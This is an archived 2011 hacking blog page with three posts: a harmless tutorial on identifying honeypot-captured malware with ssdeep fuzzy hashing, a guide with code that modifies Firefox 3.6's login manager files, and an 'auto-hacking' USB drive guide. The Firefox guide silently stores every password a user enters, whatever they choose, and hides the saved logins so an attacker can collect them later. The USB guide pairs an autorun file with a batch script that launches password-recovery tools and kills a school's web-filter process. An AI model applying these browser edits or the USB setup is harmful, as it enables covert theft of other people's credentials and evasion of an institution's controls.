Dec 25, 2011 ~ HACKER CLUB 4 U

How to Identifying unknown files by using fuzzy hashing

4:36 PM TheHackerClub 1 comment

Over the last couple of years I have captured about 2 gigabytes of malware using the Dionaea honeypot. Analysing and identifying those files can mostly be done by sites as Virustotal, Anubis or CWsandbox. By modifying the ihandler section in the dionaea.conf this can be done fully automated.
Every now and then even these excellent analysis sites come up with nothing. No result or whatsoever. This could be because its a brand new sample of malware which simply isn't recognised yet or it is a morphed sample of a known and existing one.

There still is a method to determine what kind of malware the file represent. This method is called fuzzy hashing. The technique finds its origin in spam filtering (spamsum)
From the README file:

“spamsum is a tool for generating and testing signatures on files. The signature is designed to be particularly suitable for producing a result that can be used to compare two emails and see if they are 'similar'. This can provide the core of a SPAM detection system.

The algorithms in spamsum are in two parts. The first part generates a signature which is encoded as a string of ascii characters less than 72 characters long. The second part takes a new signature and a database of existing signatures (actually just a text file with one
signature per line) and finds the existing signature that best matches the new signature. A match result in the range of 0 to 100 is generated, where 100 is a perfect match and 0 is a complete mismatch.”

A similar tool based on spamsum is SsDeep maintained by Jesse Kornblum (if you google for it, a link to a sourceforge page shows up. This site is down on the time of writing this text but there are ubuntu packages available in the ubuntu package-tree. So a apt-get install ssdeep should do the trick ).

So this can be done for unrecognized malware as well. By generating a hash from the alleged malware, we can compare it against the 2 gigabyte collection already caught and identified malware.

By using ./ssdeep -lr 11a1f1acc4ed824dc1e332ce8c2fd50e > testhash

you generate a file that looks like this:
ssdeep,1.0--blocksize:hash:hash,filename
3072:GiSkUYBQgZ+z1vezLPVr7Qe4lAtWhazqiatiPiHpOKeXmPFYZK/z:Gi3BBZ+5v0LtQx+tQauieHAXCFycz,"11a1f1acc4ed824dc1e332ce8c2fd50e"

So if we do: ./ssdeep -lrm testhash .

snip
./3a74bc105edfe54445d1fca28cc4f542 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
./556b6807d33ebfe2ec95f3598e168f62 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (85)
./daf46feccab82f6c86daae4f366bfbe1 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (75)
./3bcd999965892aea89be5606f6811bfa matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (69)
./33a91a9ed61fe8f59190f4d73791bf06 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (82)
./525fc4565d588c11a5b56aaf4f3c7a12 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
./fead84c5df2e585749a8da2ce583c926 matches testhash:11a1f1acc4ed824dc1e332ce8c2fd50e (99)
/snip

So for example, if we take out the last result “fead84c5df2e585749a8da2ce583c926” and run a clamscan against it, we come up with the following result:

fead84c5df2e585749a8da2ce583c926: Worm.Kido-175 FOUND

Where daf46feccab82f6c86daae4f366bfbe1 seems to match with Worm.Kido-268 FOUND. Another variant from the same malware family.

We we can safely assume that the file is for 99 percent the same as “11a1f1acc4ed824dc1e332ce8c2fd50e” and is a variant of Kido-175
Probably the same malware has been identified under different names. So, to be sure we have identified it correctly, we can also match it to other 99% matches in the list, e.g. "3a74bc105edfe54445d1fca28cc4f542".

To sum up: All matches seem to indicate that this particular piece of malware is _some_ variant of Kido. Possibly a new incarnation. Even if we can't pinpoint which type it is exactly, we still can make some educated guesses as to the family and its dangers. Knowing what a certain malware tends to do (e.g. it tries to find a C&C server for further instructions) we can assess the potential threat this piece of malware poses. If all connections to C&C servers are blocked (because all known C&C are filtered and the usual IRC traffic blocked) an infection with this type of malware doesn't immediately mean a widespread breakout or data-leakage.

So, even if the md5 checksums don't match, fuzzy hashing can come in handy to identify unknown and suspicious files.

Stealing Passwords with FireFox 3.6.X

4:12 PM TheHackerClub 1 comment

-[ Introduction ]-

Most users trust their browser, some trust it with everything, while others like to keep their passwords safe in their heads. Is there a way to leverage this trust and collect passwords from the not so trusting, after all if you want to surf the internet your going to have to trust something with your password.

-[ The Challenge ]-

Make FireFox 3.6.X auto-magically remember passwords, usernames and URLs. A quick Google revealed that some researchers are making changes "Hack'ing" nsLoginManagerPrompter.js to remove the save password notification, but i found an issue with just Hacking up nsLoginManagerPrompter.js so i did what all hackers do! "Hack to Learn, don't learn to hack.."

-[ FireFox 3.6.X ]-
Ok so Google reveled FireFox uses some .js files to control the Prompter and a quick find command shows us a few more

# find /usr/ -type f | grep Login | grep firefox
nsLoginManagerPrompter.js
nsLoginManager.js
nsLoginInfo.js

The great news is there are only 3 files, even better we only need to hack up 2 out of the 3 to get this working FULLY! a quick inspection of nsLoginInfo.js revealed that we can leave this file as is, leaving only two files and a few thousand lines of code to read.

-[ # sudo nano ./nsLoginManagerPrompter.js ]-
The first hack goes like this, When NEW account details are entered the Prompter displays the dialogue, if the user wants to have the details remembered the button calls pwmgr.addLogin(aLogin); all other options result in the details not being saved. if we take this call pwmgr.addLogin(aLogin); and add it after the var pwmgr = this.pwmgr; call, the details get saved no matter what the user selects, the best part about this method is the dialogue is displayed and the user get the choices they are used to seeing.

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
        var buttons = [
            // "Remember" button
            {
                label:     rememberButtonText,
                accessKey: rememberButtonAccessKey,
                popup:     null,
                callback: function(aNotificationBar, aButton) {
                    pwmgr.addLogin(aLogin);
                }
            },
            // "Never for this site" button
            {
                label:     neverButtonText,
                accessKey: neverButtonAccessKey,
                popup:     null,
                callback: function(aNotificationBar, aButton) {
                    pwmgr.setLoginSavingEnabled(aLogin.hostname, false);
                }
            },
            // "Not now" button
            {
                label:     notNowButtonText,
                accessKey: notNowButtonAccessKey,
                popup:     null,
                callback: function() { /* NOP */ }
            }
        ];

The second hack needs to remove the change confirmation dialogue, if not we reveal that the details are stored and that we want to change them, this is not good! so we are looking for a way to accept the changes no matter what, and never display the dialogue. we again find the code var pwmgr = this._pwmgr; and again look at the button code, we always want YES so the call to pwmgr.modifyLogin(aOldLogin, aNewLogin); is what we need but this time we don't want to display the dialogue at all, so using a code comment, we comment out the button code apart from the call that saves the changed password.

var pwmgr = this._pwmgr;
//        var buttons = [
            // "Yes" button
//            {
//                label:     changeButtonText,
//                accessKey: changeButtonAccessKey,
//                popup:     null,
//                callback: function(aNotificationBar, aButton) {
                    pwmgr.modifyLogin(aOldLogin, aNewLogin);
//               }
//           },
            // "No" button
//            {
//                label:     dontChangeButtonText,
//                accessKey: dontChangeButtonAccessKey,
//                popup:     null,
//                callback: function(aNotificationBar, aButton) {
                    // do nothing
//                }
//            }
//        ];

Now we are left with a Prompter that lies and steals passwords, no matter what choice the user makes.

-[ # sudo nano ./nsLoginManager.js ]-
The third and final hack is to make sure that once we have the details they are not used by FireFox, as this would indicate that the browser has them and that's not good, we want to store them for US not the user, so we just need to find the call that adds them to the page and comment it out.

_domEventListener : {
        _pwmgr : null,
        QueryInterface : XPCOMUtils.generateQI([Ci.nsIDOMEventListener,
                                                Ci.nsISupportsWeakReference]),
        handleEvent : function (event) {
            if (!event.isTrusted)
                return;
            this._pwmgr.log("domEventListener: got event " + event.type);
            switch (event.type) {
                case "DOMContentLoaded":
//                    this._pwmgr._fillDocument(event.target);
                    return;

Now we have hacked FireFox 3.6.X to store ALL and EVERY useful detail of the accounts used in the browser, we can just leave it in place for a while and wait for the accounts to increase, before going back to the

[Edit]-->[Preferences] menu within Firefox clicking the [Security] tab followed by the [Saved Passwords] button.

you are given a list of usernames and sites, all that's left are the passwords, just click

[Show Passwords]

to see the password strings revealed .

-[ Conclusion ]-
Using a shared browser is bad news, unless your the one doing the sharing, but by knowing you can and should click the [Remove] button you are better protected against this type of attack, and now maybe more inclined to check before you [Exit].
Unless your sure the system your using is safe then don't use it for anything you wouldn't want anyone else to to find, this was just some simple fun just to see if i could, but if deployed i would see no reason why accounts would not be compromised.

-[ The END ]-

Follow And Like The Hacker Club 4U On Facebook And Twitter

8:17 AM TheHackerClub 1 comment

How to Make an Auto-Hacking USB Drive

8:06 AM TheHackerClub 2 comments

I will teach you how to make a basic Auto-Hacking USB Drive. There are probably many different variationsof this. I will be showing you the most basic.

You need two things:
1) A USB Drive devoted to this
2) The programs and files that I will show you how to make or where to get. If you have trouble making the two files that I show you how to create, they can be downloaded at the end of the Instructable.

OK PEOPLE!!!!!
THIS AUTO-HACKING USB DRIVE SIMPLY CONTAINS APPLICATIONS THAT RECOVER PASSWORDS AND SUCH. STOP LEAVING POSTS ABOUT HOW YOU DON'T UNDERSTAND WHAT GETS HACKED.

Step 1A Brief Explanation

OK. If you are looking for an Instructable that will teach you how to hack the Pentagon with a 2GB USB Drive, look somewhere else. This Instructable uses a batch file, an autorun file, and downloaded programs.

So. Here we go. We will start with the Autorun file.

This file is the one that makes the pop-up window when you plug in the USB Drive. You can use this on any USB Drive, even if it has U3 on it.

Open Notepad (I'm using Notepad++) and type the following:

(autorun)
label=(Name you want the drive to have)
icon=(Icon file).ico
open=(Batch file we will make later).bat
action=(What you want the action to be)

MAKE SURE YOU DO NOT TYPE THE ()'s! Where it says (autorun), replace the parentheses with brackets (the buttons to the right of the "p" key on the keyboard. USE THE BOTTOM BRACKETS, NOT THE TWISTY FRENCH BRACKETS!)

Save this file as Autorun.inf

Make sure that you save it immediately inside your USB Drive, not inside any sub-folders (My Computer, Autohax0r).

Also, I have used an icon (an .ico file), so the USB Drive will have a different picture than the boring standard picture. To get one of these, I advise going to http://www.iconarchive.com/ to get an .ico file (you have to specifically download it as .ico). If you do this, save the icon in the same place as the Autorun file.

We will now make the batch file that starts all the "hacking programs." MAKE SURE YOU NAME IT THE SAME AS WHAT YOU CALLED IT IN THE AUTORUN FILE!

Type this into Notepad:

@echo off
title KTX
start .\Applications\FOLDER\APPLICATION.exe
start .\CommandLine\Process.exe -k TermX.exe
start .\CommandLine\Process.exe -k WinVNC.exe
pause
goto eof

I will explain the commands used:
@echo off: Makes it so the file pops-up without showing the commands. Makes it look more professional.

title: Makes a title at the top of the batch file.

start: If you can't figure this one out, you should not be reading this Instructable.

pause: Pauses the file, waits for you to press any button.

goto: Sends the file to a different part of the script.

eof: End of file.

Also, TermX.exe is a program that my school uses to keep us out of certain websites. IT IS NOT THE FIREWALL. For info on WinVNC.exe, go to http://www.processlibrary.com/directory/files/winvnc.

Where it says \FOLDER\APPLICATION, you will change this in two steps.

Save this as KTX.bat, and place it in the same place (directory) as the Autorun.inf file.

Step 4The "Hacking" Programs

Ok. We are now going on to the actual hacking programs. Go to http://www.nirsoft.net/, and browse the programs. If you have any different websites or programs, feel free to use them. I am using SniffPass, LSASecretsView, and WirelessKeyView. Install them, and place them and the folders they create in the same directory as all the other stuff.

Your computer might identify some as viruses, but don't worry. It only does this because some programs can find certain passwords.

Also, you might notice that I have a folder called "CommandLine." This is a VERY usefull program, and can be downloaded at http://www.beyondlogic.org/solutions/processutil/processutil.htm. There is also a hearty description at this page.

Step 5Modifying KTX.bat

It is now time to go back to KTX.bat (by the way, remember that TermX.exe thing I mentioned? Well, KTX stands for "Kill TermX". Feel free to change the batch file name to whatever you want, just MAKE SURE TO ADJUST THE AUTORUN FILE, TOO!).

Go to the part of the Autorun file where it says "start .\Applications\FOLDER\APPLICATION.exe". You are going to change this. Also, add or subtract as many of this line as you need. If you have three programs to run, you need three lines of this code.

First, create a folder in the same place as the Autorun and KTX files, and name it Applications. Drag all the folders that contain the hacking programs into the Applications folder. You should come up with a directory like this:
"My Computer\AutoHax0r\Applications\HACKING FOLDERS HERE (with programs inside the folders)"

Also, you do not have to have the CommandLine in the KTX file. I just use it for my school.

Step 6All Finished!

Ok. This is the end of the tutorial. You should have the Autorun.inf file, the KTX.bat file, and some hacking files of your choice. To work the magic of the Auto-Hacking USB Drive, just unplug the drive in question and plug it back in. If it doesn't work, you did something wrong, because I told you how to do it right. Either that, or you have strange computer settings.

If you are confused as to how to make the batch file or the Autorun file, download them here.